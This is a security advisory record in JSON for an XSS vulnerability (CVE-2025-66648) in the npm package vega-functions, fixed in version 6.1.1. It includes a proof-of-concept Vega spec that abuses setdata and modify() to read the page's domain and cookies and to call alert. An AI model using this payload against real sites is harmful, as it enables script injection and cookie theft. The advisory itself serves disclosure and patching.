{"id":"GHSA-m9rg-mr6g-75gm","summary":"`vega-functions` vulnerable to Cross-site Scripting via `setdata` function","details":"### Impact\n\nFor sites that allow users to supply untrusted user input, malicious use of an internal function (not part of the [public API](https://vega.github.io/vega/docs/expressions/)) could be used to run unintentional javascript (XSS).\n\n### Patches\n\nFixed in vega-functions `6.1.1`\n\n### Workarounds\n\nThere is no workaround besides upgrading. Using `vega.expressionInterpreter` as described in [CSP safe mode](https://vega.github.io/vega/usage/interpreter/) does not prevent this issue.  \n\n\n### Exploit Proof of Concept\n\nVega's expression `modify()` [function](https://github.com/vega/vega/blob/d8add5819346e5af597d82ef8253742acc0283ba/packages/vega-functions/src/functions/modify.js#L40), used by setdata, allows attacker to control both the method called and the values supplied, which results to XSS . This was a previous POC:\n\n\n```json\n{\n  \"$schema\": \"https://vega.github.io/schema/vega/v6.json\",\n  \"data\": [\n    {\n      \"name\": \"table\",\n      \"values\": [\n        {\"category\": \"A\", \"amount\": 28}\n      ]\n    }\n  ],\n  \"signals\": [\n    {\n      \"name\": \"tooltip\",\n      \"value\": {},\n      \"on\": [\n        {\"events\": {\"type\":\"timer\",\"throttle\":2000}, \"update\": \"setdata('table',[['Domain: '+event.dataflow._el.ownerDocument.domain+' , cookies: '+ event.dataflow._el.ownerDocument.cookie ]])+warn('XSS is here', modify('table',2,3,null,event.dataflow._el.ownerDocument.defaultView.alert,{'tttt':'yyyy'}) )\"},\n        {\"events\": \"rect:pointerout\",  \"update\": \"{}\"}\n      ]\n    }\n  ]\n}\n```","aliases":["CVE-2025-66648"],"modified":"2026-09-10T03:50:33.310775301Z","published":"2026-01-05T22:58:07Z","database_specific":{"nvd_published_at":"2026-01-05T22:15:51Z","cwe_ids":["CWE-79"],"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-01-05T22:58:07Z"},"references":[{"type":"WEB","url":"https://github.com/vega/vega/security/advisories/GHSA-m9rg-mr6g-75gm"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66648"},{"type":"PACKAGE","url":"https://github.com/vega/vega"}],"affected":[{"package":{"name":"vega-functions","ecosystem":"npm","purl":"pkg:npm/vega-functions"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"6.1.1"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-m9rg-mr6g-75gm/GHSA-m9rg-mr6g-75gm.json","last_known_affected_version_range":"\u003c= 6.1.0"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N"}]}